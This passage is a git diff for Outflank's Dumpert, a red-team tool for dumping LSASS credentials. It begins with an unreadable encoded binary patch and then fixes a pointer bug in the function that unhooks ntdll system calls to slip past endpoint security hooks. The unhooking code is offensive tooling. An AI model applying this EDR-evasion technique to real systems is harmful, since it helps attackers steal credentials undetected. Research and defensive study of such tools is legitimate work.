zBcs2t%_s}*DY)Zb4dkqmJJP1M<=PtWDK*y0r`5JlE8jP;5sRGYg&&fBN@X;lZxGES z=3uQW&O@GQR~9?c?EDKsXqEQGv^4+m6G-{IEfzkoR^}fXDpc9-O5uDj6K@~3>5RF5_$4({K zg%=A|h%&u!668@sQ*DH)BhCnRX=f$b&c=dpNipCbdh{ccf0q?(D8hJ8?xj>Jpf$=s z#s4T|TD^ezH8>w6z-&QS>;X4>;LDxYLzJy)^a1GLffD09?q}JN1;!QmkvKW?X zTC|XL2V7W)KLd?yqH}G7C72MUpe?2=M&=b!D{hh`2onYg!cnEZdWsdb`S(5(gvTKA z0imhgA{JokW@Ij=L5mprY{LYb&mo_=h`FN86^od+AJs8Q70Mda6&j3aC^QIn78+b| zh-daTf<3%p-?nb5sc;bs&Zupr#WX?a2->1p;jFcJ=eJs&+fxPM1?YdLGY9#*{|`E& z(au!4EmP`Z76PN!FJ|7R3!F7H9a+pgO_P?e#-{6wna4XXtuhG0PEc8`egE>(L8Bm) zfR^Fmi~gB9=CHYOv@B8~aF+UQEA_j!H_vfbNLVWf&y*V70_=rG3C=>Ja3`VBqy|+^ z<@NI%Qyr42jtHvJc?olYsm+!!+$EK%yBoK)gP>ZM$WzV%uCo`klN?f=|7GUQP58+Y zsJ>|vs%ckS&CYKGVfz*Yf{OM3llPnALKP0$VtToRxx;(IMbyI6=>4H1L5xOVT+U8;> zxQwVTxP&_jE|Z+9>X$o8y0lj6W1S~}hAFxw#e(oT(*IG?tiH-osNdE;l-a9jFib-@ zYXid;an`a$ZG)DJg3#{L-$Uu6#CJK`Bei4~I9ysd*mSVr)K)y}ksxG)j+@3TXYTJdgd-5S zR?+yZSkAoOZA{-i6$CTrIm|GdPN8ym=uZ^%{GX=9#%e*h4JtFWTEQYa);4+UEk+qc zl@Qi@Z{^qOys_dagV~|>Ak%j%SnHtL^Y&P-{E34W6VZO84}VGXB1hwwAdZ19AWK{?=O1D&t}a={bc0qp|+ zevm{#Rc!!8_{a@UG@NBf%u6JMWlSJcH$i3K37diZ!4q}^bp}t^8$>$sz!Xp-_;PnF zOGHh{;B9~jAd(YiAYvK;el}3m6h@N{u%;<4JNuD%jYK>mG`p3k6lerlAkP6F2OY-m zf(e&lfnR_~KLxl};n!w>*{vk@ z0?QPh@Ug=G1ss4U88R*rm<^(e2-hk+;cp-^)B@a%NKOR57uXvSoj3S+U>b;Y2seN- zD3J^1k&;mbv~4CgUS&dL+IW{HqHasMd71?^FU-o zHt?vz=K-_B;OZ5S1Is`wF=T|H;WAG+SK$dOGw_ER`yDvEojk_7fPaFHqXF;sh^jl_ zQw?~+%OGm_8ZZVS7&R~#7|{u<0}T`21JPUwj1+_d&^5@91Cu+;JmFbTGUOTO!Ssoe zD~$)1gQ!x%-d$uq9(WEk4h7Bw2X;lo20jt^vYYIo*TBM9>)(Soxc(EtOpL%ntCpL#(a)DjIDRDAC4fsWGcmf4dfXzRa-5Us80dj$SCD5~v zY=k#Z6OT?n?gU&6qWW`yb^FRj+W`|mlsE5!g zMV8||MHsH|vw_}Yq@m1^m~vN6gmrmNnc?yLp}sJ14Khf_~mr; z9`ZC`DJX-iD+A;CAK5M5z`Y=n6ZW4WyA~F4GBW+JWL$$PQZTiu{^*h0GI2rBEYW% z{uhXhzyqOhYk|C`%Yl&wxnaBy3P(ZJ(9Z*YzYx3QY8=zRZ;hx2Jl^PpyCB!q*#GfR zC-^UtdrW8nr9kO5P`w03fVTs>F2xvwCp^wEWZ(%6%jC(p3|I^bUxQN)cz1>DxqHB2 zCVAeB0R9ECgLet9WUN901+D>&YhVa?ybuceK-A0qz^QA|AR3zn^xA+*!FvPgH=Oie z8u7v?ln_so6j+)od-NXgtBrDFGk|!)lytrUMr@Mh8N|#7NlOcO9zz^@WQGl@3K2!!i6u9OT<^lM%K)=(nxBP)uK$jrD z2JBNT%j1D-K(r#Z0T-UZWP}c3F^J@ZEziQx3|JZrru{isOWQ5*8xZw|@Fj?b<~7i! z1p7bagg;%tOa{Ln*!!aFiFjZxXa?kjpIk!Y!~+LimS_GDUzP-+vpR zH-eT|;cC1S5C(%n!M}S>K&1xAKDvSV0-kUL=r8bu?Mr1>M*y#YqEWUSIHe480X*LH zg~cEkks;)OIVmTEV&KQW%7s&a*&uQk;U$G9^uH;~tAK0nA(BC*Yk}X~$L0l|aQg$4 z0lx!SWRZEoP7h%yPiH8E7T=YT)i?vJrcM zrOz?8kP9y`5kYz233EWwK?Q79jh;dt2%H0=i^^Q!Gtecf6S%5IHgqj;;7euy-vuTQ zR80-M!nyMbT0_)y?yAnI8%a3+X)GaL9C%ChdZ(ofLV9l_p76NB6P77F zA-!Xf4xumJtB9v}t9XewE!o7vGicF!A*9oTjzBsS>0qaW9v`=) w(}GS73fw4=BV8hjp(wthXpHq)$ diff --git a/Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.c b/Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.c index 28ee4e6..8412e28 100755 --- a/Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.c +++ b/Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.c @@ -40,9 +40,10 @@ BOOL Unhook_NativeAPI(IN PWIN_VER_INFO pWinVerInfo) { LPVOID lpProcAddress = GetProcAddress(LoadLibrary(L"ntdll.dll"), pWinVerInfo->lpApiCall); + LPVOID lpBaseAddress = lpProcAddress; ULONG OldProtection, NewProtection; SIZE_T uSize = 10; - NTSTATUS status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpProcAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection); + NTSTATUS status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpBaseAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection); if (status != STATUS_SUCCESS) { return FALSE; } @@ -52,7 +53,7 @@ BOOL Unhook_NativeAPI(IN PWIN_VER_INFO pWinVerInfo) { return FALSE; } - status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpProcAddress, &uSize, OldProtection, &NewProtection); + status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpBaseAddress, &uSize, OldProtection, &NewProtection); if (status != STATUS_SUCCESS) { return FALSE; } diff --git a/Dumpert/Outflank-Dumpert/Dumpert.c b/Dumpert/Outflank-Dumpert/Dumpert.c index 4539513..599dd78 100755 --- a/Dumpert/Outflank-Dumpert/Dumpert.c +++ b/Dumpert/Outflank-Dumpert/Dumpert.c @@ -44,9 +44,10 @@ BOOL Unhook_NativeAPI(IN PWIN_VER_INFO pWinVerInfo) { printf(" [+] %s System call nr is: 0x%x\n", pWinVerInfo->lpApiCall, AssemblyBytes[4]); printf(" [+] Unhooking %s.\n", pWinVerInfo->lpApiCall); + LPVOID lpBaseAddress = lpProcAddress; ULONG OldProtection, NewProtection; SIZE_T uSize = 10; - NTSTATUS status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpProcAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection); + NTSTATUS status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpBaseAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection); if (status != STATUS_SUCCESS) { wprintf(L" [!] ZwProtectVirtualMemory failed.\n"); return FALSE; @@ -58,7 +59,7 @@ BOOL Unhook_NativeAPI(IN PWIN_VER_INFO pWinVerInfo) { return FALSE; } - status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpProcAddress, &uSize, OldProtection, &NewProtection); + status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpBaseAddress, &uSize, OldProtection, &NewProtection); if (status != STATUS_SUCCESS) { wprintf(L" [!] ZwProtectVirtualMemory failed.\n"); return FALSE;